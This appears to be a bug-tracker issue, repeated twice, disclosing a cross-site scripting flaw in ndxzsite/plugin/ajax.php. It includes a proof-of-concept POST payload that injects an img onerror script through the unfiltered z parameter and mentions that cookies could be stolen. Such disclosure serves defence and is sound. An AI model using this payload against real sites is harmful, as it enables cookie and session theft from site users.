In page localhost//ndxzsite/plugin/ajax.php, the POST function can change the function used in PHP, the user/attacker can modify the parament and add the script which will be shown without filtering. They can use the script to steal the cookie or some things worse.
Payload used:
jxs=slideshow&i=0&z=<img src="a" onerror=alert(1)>&z=<img src="a" onerror=alert(2)>
Affected URL: http://localhost//ndxzsite/plugin/ajax.php
so,when we visit this url:localhost//ndxzsite/plugin/ajax.php and POST data:
jxs=slideshow&i=0&z=<img src="a" onerror=alert(1)>&z=<img src="a" onerror=alert(2)>
The js will executes.
The text was updated successfully, but these errors were encountered:
In page localhost//ndxzsite/plugin/ajax.php, the POST function can change the function used in PHP, the user/attacker can modify the parament and add the script which will be shown without filtering. They can use the script to steal the cookie or some things worse.
Payload used:
jxs=slideshow&i=0&z=
<img src="a" onerror=alert(1)>&z=<img src="a" onerror=alert(2)>Affected URL: http://localhost//ndxzsite/plugin/ajax.php
so,when we visit this url:localhost//ndxzsite/plugin/ajax.php and POST data:
jxs=slideshow&i=0&z=
<img src="a" onerror=alert(1)>&z=<img src="a" onerror=alert(2)>The js will executes.
The text was updated successfully, but these errors were encountered: